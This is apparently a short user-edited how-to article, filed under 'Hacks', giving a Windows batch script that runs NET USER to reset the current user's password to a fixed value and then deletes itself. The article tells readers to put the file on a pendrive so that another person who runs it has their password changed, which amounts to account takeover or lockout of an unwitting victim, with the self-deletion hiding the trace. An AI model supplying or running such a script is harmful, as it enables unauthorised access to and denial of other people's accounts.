Edit Article

Edited by Ankit Dubey, Shinako, Laura

Change one's user password by simple batch program....

Edit Steps

  1. 1
    Batch programming is very useful in such a task ....write the following code in notepad and save it as any name of your choice but remember that extension should be (.bat) eg. (pwd.bat)
  2. 2
    Open your notepad and write this code-------->
    • @echo off
    • NET USER %username% ankit
    • DEL pwd.bat
  3. 3
    Now save it as pwd.bat
  4. 4
    Your file is ready and you can copy it in one's pendrive and as soon as he execute it, the password will change

Edit Warnings

  • The author is not responsible for any damage in your computer. Do it at your own risk

Article Info

Categories: Hacks

Recent edits by: Shinako, Ankit Dubey

Thanks to all authors for creating a page that has been read 131 times.

Was this article accurate?

YesNo